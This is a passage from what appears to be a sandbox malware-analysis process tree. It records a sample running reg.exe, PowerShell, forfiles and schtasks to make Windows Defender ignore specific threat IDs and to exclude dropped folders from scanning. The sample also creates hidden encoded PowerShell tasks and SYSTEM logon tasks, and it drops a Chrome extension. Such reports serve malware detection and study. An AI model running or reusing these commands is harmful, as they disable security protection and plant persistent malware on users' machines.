      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
        3⤵
        PID:4448
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
        3⤵
        PID:4876
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3172
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
        3⤵
        PID:2756
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
        3⤵
        PID:4860
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
        3⤵
        PID:1476
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1032
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
        3⤵
        PID:4896
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
        3⤵
        PID:4548
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4792
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:64
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
        3⤵
        PID:1408
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1852
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
        3⤵
        PID:656
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3280
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1696
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4388
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
        3⤵
        PID:1260
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3276
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                3⤵
                                                  PID:4816
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1328
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:4588
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AfQFmMtUU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AfQFmMtUU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LSPuJNxSevMsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LSPuJNxSevMsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XTIErcVviYlSEsscsXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XTIErcVviYlSEsscsXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XuYvvRlLgmUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XuYvvRlLgmUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\enDWjyqEZhNU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\enDWjyqEZhNU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qDoHUGiKOnuwyvVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qDoHUGiKOnuwyvVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\aUtBPNtPIEfbItvst\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\aUtBPNtPIEfbItvst\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\VemQCkOhwRjHyFqD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\VemQCkOhwRjHyFqD\" /t REG_DWORD /d 0 /reg:64;"
                                                  2⤵
                                                  • Drops file in System32 directory
                                                  • Modifies data under HKEY_USERS
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4376
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AfQFmMtUU" /t REG_DWORD /d 0 /reg:32
                                                    3⤵
                                                      PID:4976
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AfQFmMtUU" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5012
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AfQFmMtUU" /t REG_DWORD /d 0 /reg:64
                                                      3⤵
                                                        PID:4124
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LSPuJNxSevMsC" /t REG_DWORD /d 0 /reg:32
                                                        3⤵
                                                          PID:3796
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LSPuJNxSevMsC" /t REG_DWORD /d 0 /reg:64
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:1616
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XTIErcVviYlSEsscsXR" /t REG_DWORD /d 0 /reg:32
                                                          3⤵
                                                            PID:3304
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XTIErcVviYlSEsscsXR" /t REG_DWORD /d 0 /reg:64
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:1712
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XuYvvRlLgmUn" /t REG_DWORD /d 0 /reg:32
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:4316
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XuYvvRlLgmUn" /t REG_DWORD /d 0 /reg:64
                                                            3⤵
                                                              PID:4676
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\enDWjyqEZhNU2" /t REG_DWORD /d 0 /reg:32
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:756
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\enDWjyqEZhNU2" /t REG_DWORD /d 0 /reg:64
                                                              3⤵
                                                                PID:3672
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qDoHUGiKOnuwyvVB /t REG_DWORD /d 0 /reg:32
                                                                3⤵
                                                                  PID:4868
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qDoHUGiKOnuwyvVB /t REG_DWORD /d 0 /reg:64
                                                                  3⤵
                                                                    PID:3776
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                    3⤵
                                                                      PID:672
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                      3⤵
                                                                        PID:1428
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\aUtBPNtPIEfbItvst /t REG_DWORD /d 0 /reg:32
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4320
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\aUtBPNtPIEfbItvst /t REG_DWORD /d 0 /reg:64
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:3484
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\VemQCkOhwRjHyFqD /t REG_DWORD /d 0 /reg:32
                                                                        3⤵
                                                                          PID:912
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\VemQCkOhwRjHyFqD /t REG_DWORD /d 0 /reg:64
                                                                          3⤵
                                                                            PID:3680
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "gRphGgTiB" /SC once /ST 05:50:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                          2⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:4292
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /run /I /tn "gRphGgTiB"
                                                                          2⤵
                                                                            PID:3160
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /DELETE /F /TN "gRphGgTiB"
                                                                            2⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:1032
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /CREATE /TN "mmcKQTFpdsyEWxyLI" /SC once /ST 13:18:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\VemQCkOhwRjHyFqD\XOrVWsCSJcOURFj\KyFnKwf.exe\" pi /zbmfdidRM 525403 /S" /V1 /F
                                                                            2⤵
                                                                            • Drops file in Windows directory
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:2824
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /run /I /tn "mmcKQTFpdsyEWxyLI"
                                                                            2⤵
                                                                              PID:2892
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 752
                                                                              2⤵
                                                                              • Program crash
                                                                              PID:3152
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                            1⤵
                                                                            • Command and Scripting Interpreter: PowerShell
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:512
                                                                            • C:\Windows\system32\gpupdate.exe
                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                              2⤵
                                                                                PID:3852
                                                                            • \??\c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                              1⤵
                                                                                PID:3480
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                1⤵
                                                                                  PID:4392
                                                                                • \??\c:\windows\system32\gpscript.exe
                                                                                  gpscript.exe /RefreshSystemParam
                                                                                  1⤵
                                                                                    PID:3156
                                                                                  • C:\Windows\Temp\VemQCkOhwRjHyFqD\XOrVWsCSJcOURFj\KyFnKwf.exe
                                                                                    C:\Windows\Temp\VemQCkOhwRjHyFqD\XOrVWsCSJcOURFj\KyFnKwf.exe pi /zbmfdidRM 525403 /S
                                                                                    1⤵
                                                                                    • Checks computer location settings
                                                                                    • Executes dropped EXE
                                                                                    • Drops Chrome extension
                                                                                    • Drops file in System32 directory
                                                                                    • Drops file in Program Files directory
                                                                                    • Modifies data under HKEY_USERS
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:3280
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                      2⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:5088
                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                        3⤵
                                                                                        • Indirect Command Execution
                                                                                        PID:2948
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                          4⤵
                                                                                            PID:1496
                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                              5⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:1724
                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                          3⤵
                                                                                          • Indirect Command Execution
                                                                                          PID:2780
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                            4⤵
                                                                                              PID:828
                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                5⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:5016
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                            3⤵
                                                                                            • Indirect Command Execution
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:2180
                                                                                            • C:\Windows\SysWOW64\cmd.exe
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        4⤵
        PID:3640
        • \??\c:\windows\SysWOW64\reg.exe
          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
          5⤵
          PID:4668
    • C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      3⤵
      • Indirect Command Execution
      PID:4884
      • C:\Windows\SysWOW64\cmd.exe
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        4⤵
        PID:4976
        • \??\c:\windows\SysWOW64\reg.exe
          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
          5⤵
          PID:4124
    • C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      3⤵
      • Indirect Command Execution
      • System Location Discovery: System Language Discovery
      PID:3976
      • C:\Windows\SysWOW64\cmd.exe
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        4⤵
        • System Location Discovery: System Language Discovery
        PID:1552
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell start-process -WindowStyle Hidden gpupdate.exe /force
          5⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4276
          • C:\Windows\SysWOW64\gpupdate.exe
            "C:\Windows\system32\gpupdate.exe" /force
            6⤵
            • System Location Discovery: System Language Discovery
            PID:3484
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "bJaUjLwxLUDwMvBjjy"
    2⤵
    • System Location Discovery: System Language Discovery
    PID:4928
  • C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
    2⤵
    • System Location Discovery: System Language Discovery
    PID:4688
    • C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
      3⤵
      • Indirect Command Execution
      • System Location Discovery: System Language Discovery
      PID:2696
      • C:\Windows\SysWOW64\cmd.exe
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        4⤵
        • System Location Discovery: System Language Discovery
        PID:5080
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
          5⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2296
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
            6⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3156
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\AfQFmMtUU\fMJyhT.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "PWWBhyALfcSbedp" /V1 /F
    2⤵
    • Drops file in Windows directory
    • Scheduled Task/Job: Scheduled Task
    PID:1848
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "PWWBhyALfcSbedp2" /F /xml "C:\Program Files (x86)\AfQFmMtUU\sZmuuuz.xml" /RU "SYSTEM"
    2⤵
    • System Location Discovery: System Language Discovery
    • Scheduled Task/Job: Scheduled Task
    PID:4608
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "PWWBhyALfcSbedp"
    2⤵
    PID:1844
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "PWWBhyALfcSbedp"
    2⤵
    PID:2576
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "RprkBAAFxCYqMr" /F /xml "C:\Program Files (x86)\enDWjyqEZhNU2\PwbYhRs.xml" /RU "SYSTEM"
    2⤵
    • System Location Discovery: System Language Discovery
    • Scheduled Task/Job: Scheduled Task
    PID:4216
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "isOwubXyPbRIa2" /F /xml "C:\ProgramData\qDoHUGiKOnuwyvVB\ptXituU.xml" /RU "SYSTEM"
    2⤵
    • System Location Discovery: System Language Discovery
    • Scheduled Task/Job: Scheduled Task
    PID:2056
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "ZPzYZUwOurxmvkKKy2" /F /xml "C:\Program Files (x86)\XTIErcVviYlSEsscsXR\pnzWIiw.xml" /RU "SYSTEM"
    2⤵
    • Scheduled Task/Job: Scheduled Task
    PID:1376
  • C:\Windows\SysWOW64\schtasks.exe
